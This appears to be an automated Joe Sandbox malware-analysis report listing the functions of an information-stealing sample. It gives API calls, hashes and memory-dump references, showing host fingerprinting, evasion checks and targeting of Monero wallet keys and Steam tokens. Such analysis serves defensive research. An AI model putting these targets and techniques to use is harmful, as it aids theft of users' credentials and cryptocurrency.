
Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: bed4e3321c80ac52bc27db86396fa77cd3a1a5fb7609054fea47ecf0d0a66293
Instruction ID: 514e9104080cd3877ba4463777b7a6c0c436194993c7314208f89a4b2fb8f3a8
Opcode Fuzzy Hash: bed4e3321c80ac52bc27db86396fa77cd3a1a5fb7609054fea47ecf0d0a66293
Instruction Fuzzy Hash: E2F03AB490020CABDB04EFA4DC4AFEE7778EB08700F004598BA0997290D6B4AEC5CB91

Function 00471110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0047112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00471132
ExitProcess.KERNEL32 ref: 00471143

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 0bda4d3391a7298d9c6b5aae8fc5a44677b409c2c23d52ece3dba9f421c9a7a1
Instruction ID: 37f3616787a6579acff57b788ffcb55a996646b960c0fb7545956d99e3d7bc90
Opcode Fuzzy Hash: 0bda4d3391a7298d9c6b5aae8fc5a44677b409c2c23d52ece3dba9f421c9a7a1
Instruction Fuzzy Hash: 08E086B0985348FBE7106BE4DC0AB4976B8EB04B01F105159F7087A5D0C6B526409699

Function 00481A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 00487500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00487542
Part of subcall function 00487500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048757F
Part of subcall function 00487500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487603
Part of subcall function 00487500: RtlAllocateHeap.NTDLL(00000000), ref: 0048760A

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 00487690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004876A4
Part of subcall function 00487690: RtlAllocateHeap.NTDLL(00000000), ref: 004876AB

Part of subcall function 004877C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0048DBC0,000000FF,?,00481C99,00000000,?,0110D980,00000000,?), ref: 004877F2
Part of subcall function 004877C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0048DBC0,000000FF,?,00481C99,00000000,?,0110D980,00000000,?), ref: 004877F9

Part of subcall function 00487850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
Part of subcall function 00487850: RtlAllocateHeap.NTDLL(00000000), ref: 00487887
Part of subcall function 00487850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F

Part of subcall function 004878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
Part of subcall function 004878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00487917
Part of subcall function 004878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F

Part of subcall function 00487980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00490E00,00000000,?), ref: 004879B0
Part of subcall function 00487980: RtlAllocateHeap.NTDLL(00000000), ref: 004879B7
Part of subcall function 00487980: GetLocalTime.KERNEL32(?,?,?,?,?,00490E00,00000000,?), ref: 004879C4
Part of subcall function 00487980: wsprintfA.USER32 ref: 004879F3

Part of subcall function 00487A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0110E020,00000000,?,00490E10,00000000,?,00000000,00000000), ref: 00487A63
Part of subcall function 00487A30: RtlAllocateHeap.NTDLL(00000000), ref: 00487A6A
Part of subcall function 00487A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0110E020,00000000,?,00490E10,00000000,?,00000000,00000000,?), ref: 00487A7D

Part of subcall function 00487B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0110E020,00000000,?,00490E10,00000000,?,00000000,00000000), ref: 00487B35

Part of subcall function 00487B90: GetKeyboardLayoutList.USER32(00000000,00000000,004905AF), ref: 00487BE1
Part of subcall function 00487B90: LocalAlloc.KERNEL32(00000040,?), ref: 00487BF9
Part of subcall function 00487B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00487C0D
Part of subcall function 00487B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00487C62
Part of subcall function 00487B90: LocalFree.KERNEL32(00000000), ref: 00487D22

Part of subcall function 00487D80: GetSystemPowerStatus.KERNEL32(?), ref: 00487DAD

GetCurrentProcessId.KERNEL32(00000000,?,0110D720,00000000,?,00490E24,00000000,?,00000000,00000000,?,0110E128,00000000,?,00490E20,00000000), ref: 0048207E

Part of subcall function 00489470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00489484
Part of subcall function 00489470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004894A5
Part of subcall function 00489470: CloseHandle.KERNEL32(00000000), ref: 004894AF

Part of subcall function 00487E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487E37
Part of subcall function 00487E00: RtlAllocateHeap.NTDLL(00000000), ref: 00487E3E
Part of subcall function 00487E00: RegOpenKeyExA.KERNEL32(80000002,010FC278,00000000,00020119,?), ref: 00487E5E
Part of subcall function 00487E00: RegQueryValueExA.KERNEL32(?,0110D8E0,00000000,00000000,000000FF,000000FF), ref: 00487E7F
Part of subcall function 00487E00: RegCloseKey.ADVAPI32(?), ref: 00487E92

Part of subcall function 00487F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00487FC9
Part of subcall function 00487F60: GetLastError.KERNEL32 ref: 00487FD8

Part of subcall function 00487ED0: GetSystemInfo.KERNEL32(00490E2C), ref: 00487F00
Part of subcall function 00487ED0: wsprintfA.USER32 ref: 00487F16

Part of subcall function 00488100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0110DF18,00000000,?,00490E2C,00000000,?,00000000), ref: 00488130
Part of subcall function 00488100: RtlAllocateHeap.NTDLL(00000000), ref: 00488137
Part of subcall function 00488100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00488158
Part of subcall function 00488100: __aulldiv.LIBCMT ref: 00488172
Part of subcall function 00488100: __aulldiv.LIBCMT ref: 00488180
Part of subcall function 00488100: wsprintfA.USER32 ref: 004881AC

Part of subcall function 004887C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00490E28,00000000,?), ref: 0048882F
Part of subcall function 004887C0: RtlAllocateHeap.NTDLL(00000000), ref: 00488836
Part of subcall function 004887C0: wsprintfA.USER32 ref: 00488850

Part of subcall function 00488320: RegOpenKeyExA.KERNEL32(00000000,0110B488,00000000,00020019,00000000,004905B6), ref: 004883A4

Part of subcall function 00488320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00488426
Part of subcall function 00488320: wsprintfA.USER32 ref: 00488459
Part of subcall function 00488320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0048847B
Part of subcall function 00488320: RegCloseKey.ADVAPI32(00000000), ref: 0048848C
Part of subcall function 00488320: RegCloseKey.ADVAPI32(00000000), ref: 00488499

Part of subcall function 00488680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004905B7), ref: 004886CA
Part of subcall function 00488680: Process32First.KERNEL32(?,00000128), ref: 004886DE
Part of subcall function 00488680: Process32Next.KERNEL32(?,00000128), ref: 004886F3
Part of subcall function 00488680: CloseHandle.KERNEL32(?), ref: 00488761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0048265B

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: c5dd1e34c8f5c132de6f1d64f3168101383af64121ded6ce8747d07effea1edb
Instruction ID: 1b7f0865f3e64ef9ed1786a516701eabf559bccddaaa8d65980055576e3bed66
Opcode Fuzzy Hash: c5dd1e34c8f5c132de6f1d64f3168101383af64121ded6ce8747d07effea1edb
Instruction Fuzzy Hash: 7D725FB1814118AAEB15FB91DC91EDE7338AF14304F504AAFB11662051EF7C3B5ACB7A

Function 00476D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8dad461a254903b266410ebd4a23058d456530737bb589435cc1191ef83c8a
Instruction ID: d5c1bf97a30b2db8977485abc9f851c1bb26adadd971a2ce159a2e132c35d226
Opcode Fuzzy Hash: cb8dad461a254903b266410ebd4a23058d456530737bb589435cc1191ef83c8a
Instruction Fuzzy Hash: 096139B4D00218EFCB14DF94E984BEEB7B2BB04304F11859AE41967381D739AE94DF95

Function 00485100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885

lstrlen.KERNEL32(00000000,00000000,00490ACA), ref: 0048512A

Strings

steam_tokens.txt, xrefs: 0048513F

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 3d05201b25ddd2b844517f3d891c3ed0396d0df2b6d2616419d3c5e65c1df820
Instruction ID: f1f1d4ce0385ebe5e5f74d67cffe2d3d669dbac03905b50efcd68f0839aad130
Opcode Fuzzy Hash: 3d05201b25ddd2b844517f3d891c3ed0396d0df2b6d2616419d3c5e65c1df820
Instruction Fuzzy Hash: 37F06D7180010866EB08F7B2DC579ED773C9B50308F50466FB81662492EF7CA619C7AA

Function 00487ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00490E2C), ref: 00487F00
wsprintfA.USER32 ref: 00487F16

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: aa2e02e481c934c94ff26ed5af309e790b90fcc875daffe66c64c0b20d69c587
Instruction ID: e8f440f460591a7b14186f431a44619bc7139886ccb79471c24ed16383aa8107
Opcode Fuzzy Hash: aa2e02e481c934c94ff26ed5af309e790b90fcc875daffe66c64c0b20d69c587
Instruction Fuzzy Hash: C3F096F1D44208EBCB10DF85DC45FAAF7BCFB44724F10066AF61592280D77969448BD5

Function 0047B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

lstrlen.KERNEL32(00000000), ref: 0047B9C2
lstrlen.KERNEL32(00000000), ref: 0047B9D6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 350dcaba12c24109a1fb9643917a45e9c581a9d62443d9411d063a9b9e01a465
